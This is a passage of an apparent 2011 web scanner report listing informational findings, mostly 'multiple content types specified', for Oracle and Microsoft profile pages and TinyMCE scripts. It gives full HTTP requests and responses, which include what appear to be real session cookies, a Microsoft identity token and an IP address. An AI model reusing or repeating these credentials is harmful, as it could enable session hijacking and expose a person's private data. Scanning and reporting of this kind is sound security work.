Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA; JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:24:16 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=113;ecid=167047614690248879,0)
Content-Length: 30025

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

13.30. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_profile.js

Request

GET /EndUser/jscripts/s_code_profile.js HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA; JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:24:07 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 14 Jul 2010 22:00:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=122;ecid=167047606100314287,0)
Content-Length: 1366

/* Setting the s_account */
function s_setAccount(){

var s_account="";

var curUrl = location.href;

if(curUrl.indexOf(":7101") != -1 || curUrl.indexOf("-mktad") != -1 || curUrl.index
...[SNIP]...

13.31. https://profile.microsoft.com/RegSysProfileCenter/history.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://profile.microsoft.com
Path:   /RegSysProfileCenter/history.html

Request

GET /RegSysProfileCenter/history.html?back HTTP/1.1
Host: profile.microsoft.com
Connection: keep-alive
Referer: https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; WT_NVR_RU=0=technet:1=:2=; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; omniID=1297806178674_91c6_3334_928f_a989ebdd6d47; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1297804156157:ss=1297803748324; MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.NumberOfVisits=1&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=12&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; vc=vci=1; RegSysReturnUrl=https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 08 Oct 2010 18:12:52 GMT
Accept-Ranges: bytes
ETag: "02ad6c1467cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 19:20:30 GMT
Content-Length: 405

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...

13.32. https://profile.microsoft.com/regsysprofilecenter/Footer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://profile.microsoft.com
Path:   /regsysprofilecenter/Footer.aspx

Request

GET /regsysprofilecenter/Footer.aspx?LCID=1033&WizID=345281f9-6588-4888-820f-2695af056d4f&brand=MSDN+2010&cbpage=login&mkt=EN-US&lc=1033&x=10.0.17084.0 HTTP/1.1
Host: profile.microsoft.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; WT_NVR_RU=0=technet:1=:2=; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; omniID=1297806178674_91c6_3334_928f_a989ebdd6d47; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1297804156157:ss=1297803748324; MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.NumberOfVisits=1&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=12&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; vc=vci=1; RegSysReturnUrl=https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5114
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.NumberOfVisits=2&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; expires=Sun, 27-Feb-2011 19:50:35 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=13&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; domain=.microsoft.com; expires=Mon, 27-Feb-2012 19:20:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 19:20:35 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html dir="LTR">
   <head>
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
       <base target="_top" />
       <link type
...[SNIP]...

13.33. https://profile.microsoft.com/regsysprofilecenter/rps/LeftFrame.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://profile.microsoft.com
Path:   /regsysprofilecenter/rps/LeftFrame.aspx

Request

GET /regsysprofilecenter/rps/LeftFrame.aspx?LCID=1033&WizID=345281f9-6588-4888-820f-2695af056d4f&brand=MSDN+2010&cbpage=login&mkt=EN-US&lc=1033&x=10.0.17084.0 HTTP/1.1
Host: profile.microsoft.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1298834426&rver=6.0.5276.0&wp=MCMBI&wreply=https:%2F%2Fprofile.microsoft.com%2FRegSysProfileCenter%2Fwizard.aspx%3Fwizid%3D345281f9-6588-4888-820f-2695af056d4f&lc=1033&cb=LCID%3D1033%26WizID%3D345281f9-6588-4888-820f-2695af056d4f%26brand%3DMSDN%2B2010&id=74335
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; WT_NVR_RU=0=technet:1=:2=; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; omniID=1297806178674_91c6_3334_928f_a989ebdd6d47; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1297804156157:ss=1297803748324; MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.NumberOfVisits=1&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:26&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=12&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; vc=vci=1; RegSysReturnUrl=https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=345281f9-6588-4888-820f-2695af056d4f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2324
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MicrosoftSessionCookie=Microsoft.CookieId=78d5c863-4552-4f86-b8c5-539d334c9fb7&Microsoft.CreationDate=02/27/2011 19:20:26&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.NumberOfVisits=2&SessionCookie.Id=64CAD3A97B748BF6F74BBEC85B0BED3C; expires=Sun, 27-Feb-2011 19:50:35 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=02/27/2011 19:20:35&Microsoft.VisitStartDate=02/27/2011 19:20:26&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=102861a9-5b1d-4b0c-8d49-9f073ca27715&Microsoft.NumberOfVisits=13&Microsoft.IdentityToken=z+TZ1vmNeLZxVML9U7W/lYO7k5d3HRkU0eDm4WS6Uiw+xSEwHKaM7u8zbu/2nQOrPi294TKV4roHALSLk/tSHgE2wKOsGiD40I8BozviL2QQHYemu8KnYFL5OLCF6pWu5PaGDstxStMCl3xutcDSPRMP/4ltTk9rRle9HNFHbnV8Q9r7uAWoYXz7+gb3Wjsjnk4TKCvuzGUhiDkKRxLJKWljJpRRRjrqZXBRWGMv9mpn9TKpo6vJtmJyZPqme3pMmfjWYwzZRRkvb8wTFOGVrfWIaLskIrR5Ugo8KI7kvJQOM5ILONq0+E3JCoMfBYTX03Bw+cR9BY54Cp8Obs6OeZ4O7XP45o7jNldxdSuGXxNWPEezoqN89rbWK/CsZwc+swvCrSVgcXDUGoj19SfPbyTsbXUsHdOVTI3ttXpDzBPnprkUrNI7/Cm5kJV+9Y3RKwoMuGibeo+d+KUsSYN9aKtHBSVsS3impdy9bktA5zg6S1uJEzjuKwseS5y24uCbk1wwof1yHR0A09vQQuQFPYRzFWop8oyfy/rrYR2bo3k=&Microsoft.MicrosoftId=0651-2120-0297-7612; domain=.microsoft.com; expires=Mon, 27-Feb-2012 19:20:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 19:20:34 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html dir="LTR">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<title>
Micr
...[SNIP]...

14. Multiple content types specified  previous  next
There are 6 instances of this issue:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.



14.1. http://bnxs.com/wp-includes/js/tinymce/tiny_mce.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bnxs.com
Path:   /wp-includes/js/tinymce/tiny_mce.js

Request

GET /wp-includes/js/tinymce/tiny_mce.js?ver=20081129 HTTP/1.1
Host: bnxs.com
Proxy-Connection: keep-alive
Referer: http://bnxs.com/how-to-start-your-own-url-shortening-service/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 10 Feb 2011 22:54:14 GMT
ETag: "7e0ca94-2bbce-49bf575e3d180"
Accept-Ranges: bytes
Content-Length: 179150
Content-Type: application/javascript

var tinymce={majorVersion:"3",minorVersion:"2.7",releaseDate:"2009-09-22",_init:function(){var o=this,k=document,l=window,j=navigator,b=j.userAgent,h,a,g,f,e,m;o.isOpera=l.opera&&opera.buildNumber;o.i
...[SNIP]...
<base href="'+F.documentBaseURI.getURI()+'" />'}F.iframeHTML+='<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(n.relaxedDomain){F.iframeHTML+='<script type="text/javascript">
...[SNIP]...

14.2. http://companypond.com/js/tiny_mce/tiny_mce.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://companypond.com
Path:   /js/tiny_mce/tiny_mce.js

Request

GET /js/tiny_mce/tiny_mce.js HTTP/1.1
Host: companypond.com
Proxy-Connection: keep-alive
Referer: http://companypond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=a2c7a54278c433ffb161bcded3a69224

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Mon, 11 Jan 2010 17:14:34 GMT
ETag: "b2866b-28acd-47ce6abd49280"
Accept-Ranges: bytes
Content-Length: 166605
Connection: close
Content-Type: application/javascript

var tinymce={majorVersion:"3",minorVersion:"2.7",releaseDate:"2009-09-22",_init:function(){var o=this,k=document,l=window,j=navigator,b=j.userAgent,h,a,g,f,e,m;o.isOpera=l.opera&&opera.buildNumber;o.i
...[SNIP]...
<base href="'+F.documentBaseURI.getURI()+'" />'}F.iframeHTML+='<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(n.relaxedDomain){F.iframeHTML+='<script type="text/javascript">
...[SNIP]...

14.3. http://lilypad.cranberry.com/js/tiny_mce/tiny_mce.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lilypad.cranberry.com
Path:   /js/tiny_mce/tiny_mce.js

Request

GET /js/tiny_mce/tiny_mce.js HTTP/1.1
Host: lilypad.cranberry.com
Proxy-Connection: keep-alive
Referer: http://lilypad.cranberry.com/person/new
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lilypad=04661748e9da85a3f03a38f7fd2c41cf

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:49:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Mon, 11 Jan 2010 17:14:34 GMT
ETag: "b2866b-28acd-47ce6abd49280"
Accept-Ranges: bytes
Content-Length: 166605
Connection: close
Content-Type: application/javascript

var tinymce={majorVersion:"3",minorVersion:"2.7",releaseDate:"2009-09-22",_init:function(){var o=this,k=document,l=window,j=navigator,b=j.userAgent,h,a,g,f,e,m;o.isOpera=l.opera&&opera.buildNumber;o.i
...[SNIP]...
<base href="'+F.documentBaseURI.getURI()+'" />'}F.iframeHTML+='<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(n.relaxedDomain){F.iframeHTML+='<script type="text/javascript">
...[SNIP]...

14.4. http://peoplepond.com/js/tiny_mce/tiny_mce.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplepond.com
Path:   /js/tiny_mce/tiny_mce.js

Request

GET /js/tiny_mce/tiny_mce.js HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=b452c47d22569f4373c9b3b74c244667

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:38 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Mon, 11 Jan 2010 17:14:34 GMT
ETag: "b2866b-28acd-47ce6abd49280"
Accept-Ranges: bytes
Content-Length: 166605
Connection: close
Content-Type: application/javascript

var tinymce={majorVersion:"3",minorVersion:"2.7",releaseDate:"2009-09-22",_init:function(){var o=this,k=document,l=window,j=navigator,b=j.userAgent,h,a,g,f,e,m;o.isOpera=l.opera&&opera.buildNumber;o.i
...[SNIP]...
<base href="'+F.documentBaseURI.getURI()+'" />'}F.iframeHTML+='<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(n.relaxedDomain){F.iframeHTML+='<script type="text/javascript">
...[SNIP]...

14.5. http://www.companypond.com/js/tiny_mce/tiny_mce.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.companypond.com
Path:   /js/tiny_mce/tiny_mce.js

Request

GET /js/tiny_mce/tiny_mce.js HTTP/1.1
Host: www.companypond.com
Proxy-Connection: keep-alive
Referer: http://www.companypond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=0f68f74a8439b40a778e365743fbd0bc

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:51:59 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Mon, 11 Jan 2010 17:14:34 GMT
ETag: "b2866b-28acd-47ce6abd49280"
Accept-Ranges: bytes
Content-Length: 166605
Connection: close
Content-Type: application/javascript

var tinymce={majorVersion:"3",minorVersion:"2.7",releaseDate:"2009-09-22",_init:function(){var o=this,k=document,l=window,j=navigator,b=j.userAgent,h,a,g,f,e,m;o.isOpera=l.opera&&opera.buildNumber;o.i
...[SNIP]...
<base href="'+F.documentBaseURI.getURI()+'" />'}F.iframeHTML+='<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(n.relaxedDomain){F.iframeHTML+='<script type="text/javascript">
...[SNIP]...

14.6. http://www.project-syndicate.org/javascript/tiny_mce/tiny_mce_gzip.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /javascript/tiny_mce/tiny_mce_gzip.php

Request

GET /javascript/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&core=true&suffix=&themes=simple%2Cadvanced&plugins=paste&languages=en HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
